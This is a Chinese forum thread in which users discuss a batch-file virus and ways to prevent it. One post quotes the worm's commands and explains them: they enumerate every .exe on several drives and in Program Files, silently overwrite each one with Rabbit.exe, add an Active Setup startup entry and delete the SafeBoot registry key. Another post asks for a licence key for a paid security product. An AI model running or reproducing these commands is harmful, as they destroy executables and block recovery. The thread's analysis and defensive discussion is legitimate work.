| 引用: |
| 【高歌猛进的贴子】最好还是禁止那个autorun.inf文件创建,不给其运行的机会 ……………… |
| 引用: |
| 【xushunli的贴子】谢谢楼主!!!不过怎么预防啊!!!别的电脑中了只有从装系统可是吗??所有的EXE都被替换!!那不是很可怕!!! ……………… |
| 引用: |
| 【两个铁球的贴子】谢谢提醒!带HIPS功能的安全软件一般都能防住(在注意提示,细看慢点的条件下)? 瑞星的现在带了这种功能吗?我的同事托我问问。 ……………… |
| 引用: |
| 【鸟儿天上飞的贴子】大叔呀..没看到我发的悄悄话吗??...555 快回答我的问题呀 ……………… |
| 引用: |
| 【孤独更可靠的贴子】FOR %%a in ( d: e: f: h: g: ) do dir /s/b %%a\*.exe>>c:\windows\msconfig.inf ....搜索除C盘(系统盘?如果用户把系统盘放在C盘以外的下,遭殃....)D-G所有可执行文件,把搜索到的文件保存在:\windows\msconfig.inf ... cd C:\Program Files dir *.exe /s /b >>c:\windows\msconfig1.inf ..看来他是怕覆盖到系统(EXE)文件..连Program Files目录下的也不放过? FOR /f "delims=" %%i in (c:\windows\msconfig.inf) do copy /y "C:\WINDOWS\system32\Rabbit.exe" "%%i" 读取c:\windows\msconfig.inf的EXE文件,用C:\WINDOWS\system32\Rabbit.exe覆盖过去,MD,配合参数Y用...静止模式..(覆盖过程中不提示,除非有EXE文件设置只读,不然全部遭殃.) FOR /f "delims=" %%i in (c:\windows\msconfig1.inf) do copy /y "C:\WINDOWS\system32\Rabbit.exe" "%%i" 覆盖C盘的Program Files里的EXE文件..还是静止模式 还有,猫叔,如果我没猜错的话,,Rabbit.exe应该是兔子图形吧? (1)在注册表HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\分支添加启动项: {4bf41072-b2b1-21c1-b5c1-0305f4155515} 指向C:\WINDOWS\system32\JK.exe 这个是重启时安装?JK是什么,病毒吗? (2)删除HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot 这个是删除进入安全模式的吧... 麻烦,猫叔,发份到Lyhan_1988@163.com 谢谢哈! ……………… |
| 引用: |
| 【baohe的贴子】 我的“悄悄话”早就坏了(悄悄话统统进邮箱)。 在这里说吧。 ……………… |
| 引用: |
| 【鸟儿天上飞的贴子】问题..就是在虚拟机里测试病毒..比如熊猫一类的 我家是居于网 能不能通过虚拟机传播到别的电脑上 玛姐姐也给下意见吧 大叔从来不用虚拟机的 估计问他没什么答案了 ……………… |
| 引用: |
| 【baohe的贴子】 俺不玩儿“虚拟机”。 ……………… |
| 引用: |
| 【newcenturymoon的贴子】 我测试的时候不能关机 注销 或者重启 这是为什么? ……………… |
| 引用: |
| 【baohe的贴子】 我的“悄悄话”早就坏了(悄悄话统统进邮箱)。 在这里说吧。 ……………… |
| 引用: |
| 【两个铁球的贴子】 难怪我发了那么多次求你帮助的悄悄话不见反应咧。我还以为啥时我无意中得罪了你或回帖发言中有所冒犯咧! 请给我一个能正常使用非免费版SSM的方法或KEY什么的!深深拜谢啦! ……………… |
| 引用: |
| 【newcenturymoon的贴子】 我测试的时候不能关机 注销 或者重启 这是为什么? ……………… |